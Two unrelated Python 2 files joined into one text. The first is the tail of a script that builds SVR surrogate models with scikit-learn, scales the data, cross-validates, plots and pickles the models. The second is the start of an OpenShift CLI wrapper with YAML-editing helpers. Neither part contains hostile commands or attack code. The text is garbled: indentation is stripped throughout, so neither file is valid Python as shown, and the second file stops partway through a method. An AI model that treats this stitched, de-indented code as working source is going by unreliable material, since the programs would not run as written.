best_model = search.best_estimator_
print "Best estimator:"
print best_model
print "Best parameters: "
print search.best_params_
return best_model
def main():
#picklef = open(config_file, 'r')
#config_dict = pickle.load(picklef)
print "\n========================="
print "SURROGATE MODEL GENERATOR"
print "========================="
print "PARSE AND CLEAN DATA"
print "========================="
# load design and target data into a pandas dataframe from the input csv
dataframe = pd.read_csv(input_data_file)
# drop rows (samples) with NaNs in them
dataframe = dataframe[dataframe.isnull() == False]
# split the dataframe into design and target dataframes
design_data = dataframe[features]
design_labels = design_data.axes
target_data = dataframe[targets]
target_labels = target_data.axes
if DEBUG:
print "\nFeatures:\n", design_data
print "\nTargets:\n", target_data
print "\nParsed data shapes\n design data: ", np.shape(design_data), "\n target data: ", np.shape(target_data)
print " #samples: %d\n #input parameters: %d" %(np.shape(design_data)[0], np.shape(design_data)[1])
print " #output parameters: %d" %np.shape(target_data)[1]
if DEBUG:
print "design data:"
print design_data
print "target_data:"
print target_data
if test_split > 0.0:
print "\n========================="
print "SPLIT TRAIN AND TEST DATASETS"
print "========================="
# split the data into a training set and a testing set for validation later.
X_train, X_test, Y_train, Y_test = cross_validation.train_test_split(design_data, target_data, test_size = test_split)
print "\nX_train, Y_train:", np.shape(X_train), np.shape(Y_train)
print "X_test, Y_test:", np.shape(X_test), np.shape(Y_test)
print "training sample size: %d" %np.shape(X_train)[0]
print "testing sample size: %d" %np.shape(X_test)[0]
if DEBUG:
print "X_train:\n", X_train
print "Y_train:\n", Y_train
else:
X_train = design_data
Y_train = target_data
X_test, Y_test = [], []
# standardize the training data to mean 0 and variance 1
if normalize is True:
print "\n========================="
print "DATA NORMALIZATION AND SCALING"
print "========================="
# initialize a StandardScaler object to calculate the means and scaling values of each design
# parameter (that is, it calculates the means and stdevs over the columns).
# We then use the scaler object to transform the entire input data set (except for the design ID
# number) to their normalized values.
X_train_scaler = preprocessing.MinMaxScaler(feature_range=(0,1)).fit(X_train)
X_train_scaled = pd.DataFrame(X_train_scaler.transform(X_train), columns = X_train.axes[1])
if test_split > 0.0:
X_test_scaler = preprocessing.MinMaxScaler(feature_range=(0,1)).fit(X_test)
X_test_scaled = pd.DataFrame(X_test_scaler.transform(X_test), columns = X_test.axes[1])
else:
X_test_scaled = []
print "\n feature min: ", X_train_scaler.data_min_
print " feature max: ", X_train_scaler.data_max_
print " feature range: ", X_train_scaler.data_range_
print " feature scales: \n", X_train_scaler.scale_
print "\nScaled training inputs:"
print " shape: ", np.shape(X_train_scaled)
if DEBUG:
print "\n X_train_scaled:\n", X_train_scaled
print "\nScaled testing inputs:"
print " shape:", np.shape(X_test_scaled)
print "\n X_test_scaled:\n", X_test_scaled
Y_train_scaler = preprocessing.MinMaxScaler(feature_range=(0,1)).fit(Y_train)
Y_train_scaled = pd.DataFrame(Y_train_scaler.transform(Y_train), columns = Y_train.axes[1])
if test_split > 0.0:
Y_test_scaler = preprocessing.MinMaxScaler(feature_range=(0,1)).fit(Y_test)
Y_test_scaled = pd.DataFrame(Y_test_scaler.transform(Y_test), columns = Y_test.axes[1])
else:
Y_test_scaled = []
print "\n output min: ", Y_train_scaler.data_min_
print " output max: ", Y_train_scaler.data_max_
print " output range: ", Y_train_scaler.data_range_
print " output scales: \n", Y_train_scaler.scale_
print "\nScaled training inputs:"
print " shape: ", np.shape(Y_train_scaled)
if DEBUG:
print "\n Y_train_scaled:\n", Y_train_scaled
print "\nScaled testing inputs:"
print " shape:", np.shape(Y_test_scaled)
print "\n Y_test_scaled:\n", Y_test_scaled
#print "\nBefore scaling:"
#print np.shape(X_train)
#print X_train
# This is just for visualizing the normalization transformations with histograms
if DEBUG is True and 1:
fig, axes = plt.subplots(np.shape(X_train)[1], sharex=True, sharey=True)
for ax, label in izip(axes, X_train.axes[1]):
ax.hist(X_train[label], bins = 7)
ax.set_title(label)
fig.suptitle("Distribution of design parameters before normalization")
fig, axes = plt.subplots(np.shape(X_train_scaled)[1], sharex=True,sharey=True)
print X_train_scaled.axes
for ax, label in izip(axes, X_train_scaled.axes[1]):
ax.hist(X_train_scaled[label], bins=7)
ax.set_title(label)
fig.suptitle("Distribution of design parameters after normalization")
if len(Y_train) is not 0 and len(Y_train_scaled) is not 0:
fig, axes = plt.subplots(np.shape(Y_train)[1], sharex=True,sharey=True)
for ax, label in izip(axes, Y_train.axes[1]):
ax.hist(Y_train[label], bins=7)
ax.set_title(label)
fig.suptitle("Distribution of performance parameters before normalization")
fig, axes = plt.subplots(np.shape(Y_train_scaled)[1], sharex=True,sharey=True)
for ax, label in izip(axes, Y_train_scaled.axes[1]):
ax.hist(Y_train_scaled[label], bins=7)
ax.set_title(label)
fig.suptitle("Distribution of performance parameters after normalization")
plt.show()
else:
X_train_scaled = X_train
X_test_scaled = X_test
print "\n========================="
print "SUPPORT VECTOR REGRESSION"
print "========================="
surrogate_models = [] # Array to hold the surrogate model objects for each output parameter
# If gridsearch is True, use scikit-learn's gridsearch to systematically search for optimal
# hyperparameter values. Else, we use hyperparameter values set by the user to construct and
# train surrogate models for each performance variable.
if gridsearch:
# construct a surrogate model for each output parameter (performance metric)
print "My God... They're learning..."
for n, target_parameter in enumerate(Y_train_scaled):
print "\n------------------------"
print target_parameter
print "------------------------"
if DEBUG: print Y_train_scaled[target_parameter]
model = generate_optimized_surrogate(X_train_scaled,
Y_train_scaled[target_parameter],
label = target_parameter,
C_range = C_range,
epsilon_range = epsilon_scale,
grid_iter = optimize_iter,
scoring = model_scoring)
surrogate_models.append(model)
else:
for n, target_parameter in enumerate(Y_train_scaled):
print "\n------------------------"
print target_parameter
print "------------------------"
model = SVR(kernel='rbf', C = C_tuple[n], epsilon = epsilon_tuple[n], gamma = 'auto').fit(X_train_scaled, Y_train_scaled[target_parameter])
surrogate_models.append(model)
print "\nSurrogate models:\n", surrogate_models
"""
print np.shape(surrogate_model)
print surrogate_model
# make predictions over the output surrogate data.
#prediction_outputs = [model.predict(X_train_scaled) for model in surrogate_model]
prediction_outputs = surrogate_model[1].predict(X_train_scaled)
print np.shape(prediction_outputs)
print prediction_outputs
"""
# If the sampled data was split into training and testing sets, evaluate the generated models
# on the testing data. Otherwise, compute cross-validated scores using the training data.
# First, instantiate a list to hold our scaler (transformation) objects to transform the values
# predicted by the models to the range of the performance metrics being modeled.
Y_scalers = []
for n, model in enumerate(surrogate_models):
print "\n------------------------"
print targets[n]
print "------------------------"
if test_split > 0.0:
print "\n========================="
print "MODEL EVALUATION"
print "========================="
predictions = model.predict(X_test_scaled)
target_values = Y_test[targets[n]]
# reverse-transform the outputs and predictions back to their original values
Y_test_scaler = preprocessing.MinMaxScaler().fit(Y_test[targets[n]].reshape(-1,1))
predictions = Y_test_scaler.inverse_transform(predictions.reshape(-1,1))
#print Y_test[:,n]
#print predictions
#result_array = np.column_stack((Y_test[:,n].reshape(-1,1), predictions))
print "test values, predicted values"
print target_values, predictions
print "model score:", metrics.mean_squared_error(target_values, predictions)
#print "model score: ", model.score(target_values, predictions)
print "model parameters:"
parameters = model.get_params()
print ' C: ', parameters['C']
print ' epsilon: ', parameters['epsilon']
#print ' gamma: ', parameters['gamma']
# If a testing set was not set aside, use Leave-One-Out (LOO) cross-validation
else:
scaled_target_values = Y_train_scaled[targets[n]].values
target_values = Y_train[targets[n]].values
scores = cross_validation.cross_val_score(model,
X_train_scaled.values,
scaled_target_values,
scoring = 'mean_squared_error',
cv = len(Y_train_scaled))
avg_score = np.mean(scores)
score_std = np.std(scores)
print "model avg score: %1.5f (+/-%1.5f)" %(-avg_score, score_std)
predictions = cross_validation.cross_val_predict(model,
X_train_scaled.values,
scaled_target_values,
cv = len(Y_train_scaled))
# Make a scaler and inverse transform the predictions back to their original, unscaled ranges
Y_test_scaler = preprocessing.MinMaxScaler().fit(target_values)
predictions = Y_test_scaler.inverse_transform(predictions)
Y_scalers.append(Y_test_scaler)
print "Y_scalers[%d]: "%n, Y_scalers[n]
# plot the predicted vs actual values
fig, ax = plt.subplots()
ax.scatter(predictions, target_values, marker = 'x')
ax.plot(target_values, target_values, c='b', linestyle='--')
ax.set_xlabel("Predicted Values")
ax.set_ylabel("Actual Values")
ax.set_title("Predicted vs Actual Target Values: %s" %targets[n])
fig.savefig('%s%s_%s_predicted_vs_actual.png' %(output_directory, data_title, targets[n]))
"""
if test_split > 0.0:
print "\n========================="
print "MODEL EVALUATION"
print "========================="
# step through each model and evaluate its performance on the testing data
for n, model in enumerate(surrogate_models):
print "\n------------------------"
print targets[n]
print "------------------------"
predictions = model.predict(X_test_scaled)
target_values = Y_test[targets[n]]
# reverse-transform the outputs and predictions back to their original values
Y_test_scaler = preprocessing.MinMaxScaler().fit(Y_test[targets[n]].reshape(-1,1))
predictions = Y_test_scaler.inverse_transform(predictions.reshape(-1,1))
#print Y_test[:,n]
#print predictions
#result_array = np.column_stack((Y_test[:,n].reshape(-1,1), predictions))
print "test values, predicted values"
print target_values, predictions
print "model score:", metrics.mean_squared_error(target_values, predictions)
#print "model score: ", model.score(target_values, predictions)
print "model parameters:"
parameters = model.get_params()
print ' C: ', parameters['C']
print ' epsilon: ', parameters['epsilon']
#print ' gamma: ', parameters['gamma']
# plot the predicted vs actual values
fig, ax = plt.subplots()
ax.scatter(predictions, target_values, marker = 'x')
ax.plot(target_values, target_values, c='b', linestyle='--')
ax.set_xlabel("Predicted Values")
ax.set_ylabel("Actual Values")
ax.set_title("Predicted vs Actual Target Values: %s" %targets[n])
fig.savefig('%s%s_predicted_vs_actual.png' %(output_directory, targets[n]))
else:
print "\n========================="
print "MODEL CROSS-VALIDATION"
print "========================="
# Use cross-validation to evaluate the models created above
for n, model in enumerate(surrogate_models):
print "\n------------------------"
print targets[n]
print "------------------------"
scaled_target_values = Y_train_scaled[targets[n]].values
target_values = Y_train[targets[n]].values
scores = cross_validation.cross_val_score(model,
X_train_scaled.values,
scaled_target_values,
scoring = 'mean_squared_error',
cv = len(Y_train_scaled))
avg_score = np.mean(scores)
score_std = np.std(scores)
print "model avg score: %1.5f (+/-%1.5f)" %(-avg_score, score_std)
predictions = cross_validation.cross_val_predict(model,
X_train_scaled.values,
scaled_target_values,
cv = len(Y_train_scaled))
# Make a scaler and inverse transform the predictions back to their original, unscaled ranges
Y_test_scaler = preprocessing.MinMaxScaler().fit(target_values)
predictions = Y_test_scaler.inverse_transform(predictions)
# plot the predicted vs actual values
fig, ax = plt.subplots()
ax.scatter(predictions, target_values, marker = 'x')
ax.plot(target_values, target_values, c='b', linestyle='--')
ax.set_xlabel("Predicted Values")
ax.set_ylabel("Actual Values")
ax.set_title("Predicted vs Actual Target Values: %s" %targets[n])
fig.savefig('%s%s_predicted_vs_actual.png' %(output_directory, targets[n]))
"""
if save_models is True:
model_file = data_title + "_surrogate_models.pkl"
input_scaler_file = data_title + "_input_scalers.pkl"
scaler_file = data_title + "_datascalers.pkl"
models_savefile = output_directory + model_file
input_scalers_savefile = output_directory + input_scaler_file
scalers_savefile = output_directory + scaler_file
#models_savefile = "%s%s_surrogate_models.pkl" %(output_directory, data_name)
#scalers_savefile = "%s%s_datascalers.pkl" %(output_directory, data_name)
with open(models_savefile, 'w') as f:
pickle.dump(surrogate_models, f)
with open(input_scalers_savefile, 'w') as f:
pickle.dump(X_train_scaler, f)
with open(scalers_savefile, 'w') as f:
pickle.dump(Y_scalers, f)
return surrogate_models, Y_scalers
if __name__ == "__main__":
import matplotlib.pyplot as plt
start = time()
main()
print "\nSurrogate Modeling script took %2.2f seconds" %(time()-start)
| |
#!/usr/bin/env python # pylint: disable=too-many-lines
# ___ ___ _ _ ___ ___ _ _____ ___ ___
# / __| __| \| | __| _ \ /_\_ _| __| \
# | (_ | _|| .` | _|| / / _ \| | | _|| |) |
# \___|___|_|\_|___|_|_\/_/_\_\_|_|___|___/_ _____
# | \ / _ \ | \| |/ _ \_ _| | __| \_ _|_ _|
# | |) | (_) | | .` | (_) || | | _|| |) | | | |
# |___/ \___/ |_|\_|\___/ |_| |___|___/___| |_|
'''
OpenShiftCLI class that wraps the oc commands in a subprocess
'''
# pylint: disable=too-many-lines
import atexit
import json
import os
import re
import shutil
import subprocess
import ruamel.yaml as yaml
#import yaml
#
## This is here because of a bug that causes yaml
## to incorrectly handle timezone info on timestamps
#def timestamp_constructor(_, node):
# '''return timestamps as strings'''
# return str(node.value)
#yaml.add_constructor(u'tag:yaml.org,2002:timestamp', timestamp_constructor)
class OpenShiftCLIError(Exception):
'''Exception class for openshiftcli'''
pass
# pylint: disable=too-few-public-methods
class OpenShiftCLI(object):
''' Class to wrap the command line tools '''
def __init__(self,
namespace,
kubeconfig='/etc/origin/master/admin.kubeconfig',
verbose=False,
all_namespaces=False):
''' Constructor for OpenshiftCLI '''
self.namespace = namespace
self.verbose = verbose
self.kubeconfig = kubeconfig
self.all_namespaces = all_namespaces
# Pylint allows only 5 arguments to be passed.
# pylint: disable=too-many-arguments
def _replace_content(self, resource, rname, content, force=False, sep='.'):
''' replace the current object with the content '''
res = self._get(resource, rname)
if not res['results']:
return res
fname = '/tmp/%s' % rname
yed = Yedit(fname, res['results'][0], separator=sep)
changes = []
for key, value in content.items():
changes.append(yed.put(key, value))
if any([change[0] for change in changes]):
yed.write()
atexit.register(Utils.cleanup, [fname])
return self._replace(fname, force)
return {'returncode': 0, 'updated': False}
def _replace(self, fname, force=False):
'''return all pods '''
cmd = ['-n', self.namespace, 'replace', '-f', fname]
if force:
cmd.append('--force')
return self.openshift_cmd(cmd)
def _create_from_content(self, rname, content):
'''return all pods '''
fname = '/tmp/%s' % rname
yed = Yedit(fname, content=content)
yed.write()
atexit.register(Utils.cleanup, [fname])
return self._create(fname)
def _create(self, fname):
'''return all pods '''
return self.openshift_cmd(['create', '-f', fname, '-n', self.namespace])
def _delete(self, resource, rname, selector=None):
'''return all pods '''
cmd = ['delete', resource, rname, '-n', self.namespace]
if selector:
cmd.append('--selector=%s' % selector)
return self.openshift_cmd(cmd)
def _process(self, template_name, create=False, params=None, template_data=None):
'''return all pods '''
cmd = ['process', '-n', self.namespace]
if template_data:
cmd.extend(['-f', '-'])
else:
cmd.append(template_name)
if params:
param_str = ["%s=%s" % (key, value) for key, value in params.items()]
cmd.append('-v')
cmd.extend(param_str)
results = self.openshift_cmd(cmd, output=True, input_data=template_data)
if results['returncode'] != 0 or not create:
return results
fname = '/tmp/%s' % template_name
yed = Yedit(fname, results['results'])
yed.write()
atexit.register(Utils.cleanup, [fname])
return self.openshift_cmd(['-n', self.namespace, 'create', '-f', fname])
def _get(self, resource, rname=None, selector=None):
'''return a resource by name '''
cmd = ['get', resource]
if selector:
cmd.append('--selector=%s' % selector)
if self.all_namespaces:
cmd.extend(['--all-namespaces'])
elif self.namespace:
cmd.extend(['-n', self.namespace])
cmd.extend(['-o', 'json'])
if rname:
cmd.append(rname)
rval = self.openshift_cmd(cmd, output=True)
# Ensure results are retuned in an array
if rval.has_key('items'):
rval['results'] = rval['items']
elif not isinstance(rval['results'], list):
rval['results'] = [rval['results']]
return rval
def _schedulable(self, node=None, selector=None, schedulable=True):
''' perform oadm manage-node scheduable '''
cmd = ['manage-node']
if node:
cmd.extend(node)
else:
cmd.append('--selector=%s' % selector)
cmd.append('--schedulable=%s' % schedulable)
return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')
def _list_pods(self, node=None, selector=None, pod_selector=None):
''' perform oadm manage-node evacuate '''
cmd = ['manage-node']
if node:
cmd.extend(node)
else:
cmd.append('--selector=%s' % selector)
if pod_selector:
cmd.append('--pod-selector=%s' % pod_selector)
cmd.extend(['--list-pods', '-o', 'json'])
return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')
#pylint: disable=too-many-arguments
def _evacuate(self, node=None, selector=None, pod_selector=None, dry_run=False, grace_period=None, force=False):
''' perform oadm manage-node evacuate '''
cmd = ['manage-node']
if node:
cmd.extend(node)
else:
cmd.append('--selector=%s' % selector)
if dry_run:
cmd.append('--dry-run')
if pod_selector:
cmd.append('--pod-selector=%s' % pod_selector)
if grace_period:
cmd.append('--grace-period=%s' % int(grace_period))
if force:
cmd.append('--force')
cmd.append('--evacuate')
return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')
def _import_image(self, url=None, name=None, tag=None):
''' perform image import '''
cmd = ['import-image']
image = '{0}'.format(name)
if tag:
image += ':{0}'.format(tag)
cmd.append(image)
if url:
cmd.append('--from={0}/{1}'.format(url, image))
cmd.append('-n{0}'.format(self.namespace))
cmd.append('--confirm')
return self.openshift_cmd(cmd)
#pylint: disable=too-many-arguments
def openshift_cmd(self, cmd, oadm=False, output=False, output_type='json', input_data=None):
'''Base command for oc '''
cmds = []
if oadm:
cmds = ['/usr/bin/oadm']
else:
cmds = ['/usr/bin/oc']
cmds.extend(cmd)
rval = {}
results = ''
err = None
if self.verbose:
print ' '.join(cmds)
proc = subprocess.Popen(cmds,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env={'KUBECONFIG': self.kubeconfig})
stdout, stderr = proc.communicate(input_data)
rval = {"returncode": proc.returncode,
"results": results,
"cmd": ' '.join(cmds),
}
if proc.returncode == 0:
if output:
if output_type == 'json':
try:
rval['results'] = json.loads(stdout)
except ValueError as err:
if "No JSON object could be decoded" in err.message:
err = err.message
elif output_type == 'raw':
rval['results'] = stdout
if self.verbose:
print stdout
print stderr
if err:
rval.update({"err": err,
"stderr": stderr,
"stdout": stdout,
"cmd": cmds
})
else:
rval.update({"stderr": stderr,
"stdout": stdout,
"results": {},
})
return rval
class Utils(object):
''' utilities for openshiftcli modules '''
@staticmethod
def create_file(rname, data, ftype='yaml'):
''' create a file in tmp with name and contents'''
path = os.path.join('/tmp', rname)
with open(path, 'w') as fds:
if ftype == 'yaml':
fds.write(yaml.dump(data, Dumper=yaml.RoundTripDumper))
elif ftype == 'json':
fds.write(json.dumps(data))
else:
fds.write(data)
# Register cleanup when module is done
atexit.register(Utils.cleanup, [path])
return path
@staticmethod
def create_files_from_contents(content, content_type=None):
'''Turn an array of dict: filename, content into a files array'''
if not isinstance(content, list):
content = [content]
files = []
for item in content:
path = Utils.create_file(item['path'], item['data'], ftype=content_type)
files.append({'name': os.path.basename(path), 'path': path})
return files
@staticmethod
def cleanup(files):
'''Clean up on exit '''
for sfile in files:
if os.path.exists(sfile):
if os.path.isdir(sfile):
shutil.rmtree(sfile)
elif os.path.isfile(sfile):
os.remove(sfile)
@staticmethod
def exists(results, _name):
''' Check to see if the results include the name '''
if not results:
return False
if Utils.find_result(results, _name):
return True
return False
@staticmethod
def find_result(results, _name):
''' Find the specified result by name'''
rval = None
for result in results:
if result.has_key('metadata') and result['metadata']['name'] == _name:
rval = result
break
return rval
@staticmethod
def get_resource_file(sfile, sfile_type='yaml'):
''' return the service file '''
contents = None
with open(sfile) as sfd:
contents = sfd.read()
if sfile_type == 'yaml':
contents = yaml.load(contents, yaml.RoundTripLoader)
elif sfile_type == 'json':
contents = json.loads(contents)
return contents
# Disabling too-many-branches. This is a yaml dictionary comparison function
# pylint: disable=too-many-branches,too-many-return-statements,too-many-statements
@staticmethod
def check_def_equal(user_def, result_def, skip_keys=None, debug=False):
''' Given a user defined definition, compare it with the results given back by our query. '''
# Currently these values are autogenerated and we do not need to check them
skip = ['metadata', 'status']
if skip_keys:
skip.extend(skip_keys)
for key, value in result_def.items():
if key in skip:
continue
# Both are lists
if isinstance(value, list):
if not user_def.has_key(key):
if debug:
print 'User data does not have key [%s]' % key
print 'User data: %s' % user_def
return False
if not isinstance(user_def[key], list):
if debug:
print 'user_def[key] is not a list key=[%s] user_def[key]=%s' % (key, user_def[key])
return False
if len(user_def[key]) != len(value):
if debug:
print "List lengths are not equal."
print "key=[%s]: user_def[%s] != value[%s]" % (key, len(user_def[key]), len(value))
print "user_def: %s" % user_def[key]
print "value: %s" % value
return False
for values in zip(user_def[key], value):
if isinstance(values[0], dict) and isinstance(values[1], dict):
if debug:
print 'sending list - list'
print type(values[0])
print type(values[1])
result = Utils.check_def_equal(values[0], values[1], skip_keys=skip_keys, debug=debug)
if not result:
print 'list compare returned false'
return False
elif value != user_def[key]:
if debug:
print 'value should be identical'
print value
print user_def[key]
return False
# recurse on a dictionary
elif isinstance(value, dict):
if not user_def.has_key(key):
if debug:
print "user_def does not have key [%s]" % key
return False
if not isinstance(user_def[key], dict):
if debug:
print "dict returned false: not instance of dict"
return False
# before passing ensure keys match
api_values = set(value.keys()) - set(skip)
user_values = set(user_def[key].keys()) - set(skip)
if api_values != user_values:
if debug:
print "keys are not equal in dict"
print api_values
print user_values
return False
result = Utils.check_def_equal(user_def[key], value, skip_keys=skip_keys, debug=debug)
if not result:
if debug:
print "dict returned false"
print result
return False
# Verify each key, value pair is the same
else:
if not user_def.has_key(key) or value != user_def[key]:
if debug:
print "value not equal; user_def does not have key"
print key
print value
if user_def.has_key(key):
print user_def[key]
return False
if debug:
print 'returning true'
return True
class OpenShiftCLIConfig(object):
'''Generic Config'''
def __init__(self, rname, namespace, kubeconfig, options):
self.kubeconfig = kubeconfig
self.name = rname
self.namespace = namespace
self._options = options
@property
def config_options(self):
''' return config options '''
return self._options
def to_option_list(self):
'''return all options as a string'''
return self.stringify()
def stringify(self):
''' return the options hash as cli params in a string '''
rval = []
for key, data in self.config_options.items():
if data['include'] \
and (data['value'] or isinstance(data['value'], int)):
rval.append('--%s=%s' % (key.replace('_', '-'), data['value']))
return rval
class YeditException(Exception):
''' Exception class for Yedit '''
pass
class Yedit(object):
''' Class to modify yaml files '''
re_valid_key = r"(((\[-?\d+\])|([0-9a-zA-Z%s/_-]+)).?)+$"
re_key = r"(?:\[(-?\d+)\])|([0-9a-zA-Z%s/_-]+)"
com_sep = set(['.', '#', '|', ':'])
# pylint: disable=too-many-arguments
def __init__(self, filename=None, content=None, content_type='yaml', separator='.', backup=False):
self.content = content
self._separator = separator
self.filename = filename
self.__yaml_dict = content
self.content_type = content_type
self.backup = backup
self.load(content_type=self.content_type)
if self.__yaml_dict == None:
self.__yaml_dict = {}
@property
def separator(self):
''' getter method for yaml_dict '''
return self._separator
@separator.setter
def separator(self):
''' getter method for yaml_dict '''
return self._separator
@property
def yaml_dict(self):
''' getter method for yaml_dict '''
return self.__yaml_dict
@yaml_dict.setter
def yaml_dict(self, value):
''' setter method for yaml_dict '''
self.__yaml_dict = value
@staticmethod
def parse_key(key, sep='.'):
'''parse the key allowing the appropriate separator'''
common_separators = list(Yedit.com_sep - set([sep]))
return re.findall(Yedit.re_key % ''.join(common_separators), key)
@staticmethod
def valid_key(key, sep='.'):
'''validate the incoming key'''
common_separators = list(Yedit.com_sep - set([sep]))
if not re.match(Yedit.re_valid_key % ''.join(common_separators), key):
return False
return True
@staticmethod
def remove_entry(data, key, sep='.'):
''' remove data at location key '''
if key == '' and isinstance(data, dict):
data.clear()
return True
elif key == '' and isinstance(data, list):
del data[:]
return True
if not (key and Yedit.valid_key(key, sep)) and isinstance(data, (list, dict)):
return None
key_indexes = Yedit.parse_key(key, sep)
for arr_ind, dict_key in key_indexes[:-1]:
if dict_key and isinstance(data, dict):
data = data.get(dict_key, None)
elif arr_ind and isinstance(data, list) and int(arr_ind) <= len(data) - 1:
data = data[int(arr_ind)]
else:
return None
# process last index for remove
# expected list entry
if key_indexes[-1][0]:
if isinstance(data, list) and int(key_indexes[-1][0]) <= len(data) - 1:
del data[int(key_indexes[-1][0])]
return True
# expected dict entry
elif key_indexes[-1][1]:
if isinstance(data, dict):
del data[key_indexes[-1][1]]
return True
@staticmethod
def add_entry(data, key, item=None, sep='.'):
''' Get an item from a dictionary with key notation a.b.c
d = {'a': {'b': 'c'}}}
key = a#b
return c
'''
if key == '':
pass
elif not (key and Yedit.valid_key(key, sep)) and isinstance(data, (list, dict)):
return None
key_indexes = Yedit.parse_key(key, sep)
for arr_ind, dict_key in key_indexes[:-1]:
if dict_key:
if isinstance(data, dict) and data.has_key(dict_key) and data[dict_key]:
data = data[dict_key]
continue
elif data and not isinstance(data, dict):
return None
data[dict_key] = {}
data = data[dict_key]
elif arr_ind and isinstance(data, list) and int(arr_ind) <= len(data) - 1:
data = data[int(arr_ind)]
else:
return None
if key == '':
data = item
# process last index for add
# expected list entry
elif key_indexes[-1][0] and isinstance(data, list) and int(key_indexes[-1][0]) <= len(data) - 1:
data[int(key_indexes[-1][0])] = item
# expected dict entry
elif key_indexes[-1][1] and isinstance(data, dict):
data[key_indexes[-1][1]] = item
return data
@staticmethod
def get_entry(data, key, sep='.'):
''' Get an item from a dictionary with key notation a.b.c
d = {'a': {'b': 'c'}}}
key = a.b
return c
'''
if key == '':
pass
elif not (key and Yedit.valid_key(key, sep)) and isinstance(data, (list, dict)):
return None
key_indexes = Yedit.parse_key(key, sep)
for arr_ind, dict_key in key_indexes:
if dict_key and isinstance(data, dict):
data = data.get(dict_key, None)
elif arr_ind and isinstance(data, list) and int(arr_ind) <= len(data) - 1:
data = data[int(arr_ind)]
else:
return None
return data
def write(self):
''' write to file '''
if not self.filename:
raise YeditException('Please specify a filename.')
if self.backup and self.file_exists():
shutil.copy(self.filename, self.filename + '.orig')
tmp_filename = self.filename + '.yedit'
try:
with open(tmp_filename, 'w') as yfd:
# pylint: disable=no-member,maybe-no-member
if hasattr(self.yaml_dict, 'fa'):
self.yaml_dict.fa.set_block_style()
yfd.write(yaml.dump(self.yaml_dict, Dumper=yaml.RoundTripDumper))
except Exception as err:
raise YeditException(err.message)
os.rename(tmp_filename, self.filename)
return (True, self.yaml_dict)
def read(self):
''' read from file '''
# check if it exists
if self.filename == None or not self.file_exists():
return None
contents = None
with open(self.filename) as yfd:
contents = yfd.read()
return contents
def file_exists(self):
''' return whether file exists '''
if os.path.exists(self.filename):
return True
return False
def load(self, content_type='yaml'):
''' return yaml file '''
contents = self.read()
if not contents and not self.content:
return None
if self.content:
if isinstance(self.content, dict):
self.yaml_dict = self.content
return self.yaml_dict
elif isinstance(self.content, str):
contents = self.content
# check if it is yaml
try:
if content_type == 'yaml' and contents:
self.yaml_dict = yaml.load(contents, yaml.RoundTripLoader)
# pylint: disable=no-member,maybe-no-member
if hasattr(self.yaml_dict, 'fa'):
self.yaml_dict.fa.set_block_style()
elif content_type == 'json' and contents:
self.yaml_dict = json.loads(contents)
except yaml.YAMLError as err:
# Error loading yaml or json
raise YeditException('Problem with loading yaml file. %s' % err)
return self.yaml_dict
def get(self, key):
''' get a specified key'''
try:
entry = Yedit.get_entry(self.yaml_dict, key, self.separator)
except KeyError as _:
entry = None
return entry
def pop(self, path, key_or_item):
''' remove a key, value pair from a dict or an item for a list'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError as _:
entry = None
if entry == None:
return (False, self.yaml_dict)
if isinstance(entry, dict):
# pylint: disable=no-member,maybe-no-member
if entry.has_key(key_or_item):
entry.pop(key_or_item)
return (True, self.yaml_dict)
return (False, self.yaml_dict)
elif isinstance(entry, list):
# pylint: disable=no-member,maybe-no-member
ind = None
try:
ind = entry.index(key_or_item)
except ValueError:
return (False, self.yaml_dict)
entry.pop(ind)
return (True, self.yaml_dict)
return (False, self.yaml_dict)
def delete(self, path):
''' remove path from a dict'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError as _:
entry = None
if entry == None:
return (False, self.yaml_dict)
result = Yedit.remove_entry(self.yaml_dict, path, self.separator)
if not result:
return (False, self.yaml_dict)
return (True, self.yaml_dict)
def exists(self, path, value):
''' check if value exists at path'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError as _:
entry = None
if isinstance(entry, list):
if value in entry:
return True
return False
elif isinstance(entry, dict):
if isinstance(value, dict):
rval = False
for key, val in value.items():
if entry[key] != val:
rval = False
break
else:
rval = True
return rval
return value in entry
return entry == value
def append(self, path, value):
'''append value to a list'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError as _:
entry = None
if entry is None:
self.put(path, [])
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
if not isinstance(entry, list):
return (False, self.yaml_dict)
# pylint: disable=no-member,maybe-no-member
entry.append(value)
return (True, self.yaml_dict)
# pylint: disable=too-many-arguments
def update(self, path, value, index=None, curr_value=None):
''' put path, value into a dict '''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError as _:
entry = None
if isinstance(entry, dict):
# pylint: disable=no-member,maybe-no-member
if not isinstance(value, dict):
raise YeditException('Cannot replace key, value entry in dict with non-dict type.' \
' value=[%s] [%s]' % (value, type(value)))
entry.update(value)
return (True, self.yaml_dict)
elif isinstance(entry, list):
# pylint: disable=no-member,maybe-no-member
ind = None
if curr_value:
try:
ind = entry.index(curr_value)
except ValueError:
return (False, self.yaml_dict)
elif index != None:
ind = index
if ind != None and entry[ind] != value:
entry[ind] = value
return (True, self.yaml_dict)
# see if it exists in the list
try:
ind = entry.index(value)
except ValueError:
# doesn't exist, append it
entry.append(value)
return (True, self.yaml_dict)
#already exists, return
if ind != None:
return (False, self.yaml_dict)
return (False, self.yaml_dict)
def put(self, path, value):
''' put path, value into a dict '''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError as _:
entry = None
if entry == value:
return (False, self.yaml_dict)
# deepcopy didn't work
tmp_copy = yaml.load(yaml.round_trip_dump(self.yaml_dict, default_flow_style=False), yaml.RoundTripLoader)
# pylint: disable=no-member
if hasattr(self.yaml_dict, 'fa'):
tmp_copy.fa.set_block_style()
result = Yedit.add_entry(tmp_copy, path, value, self.separator)
if not result:
return (False, self.yaml_dict)
self.yaml_dict = tmp_copy
return (True, self.yaml_dict)
def create(self, path, value):
''' create a yaml file '''
if not self.file_exists():
# deepcopy didn't work
tmp_copy = yaml.load(yaml.round_trip_dump(self.yaml_dict, default_flow_style=False), yaml.RoundTripLoader)
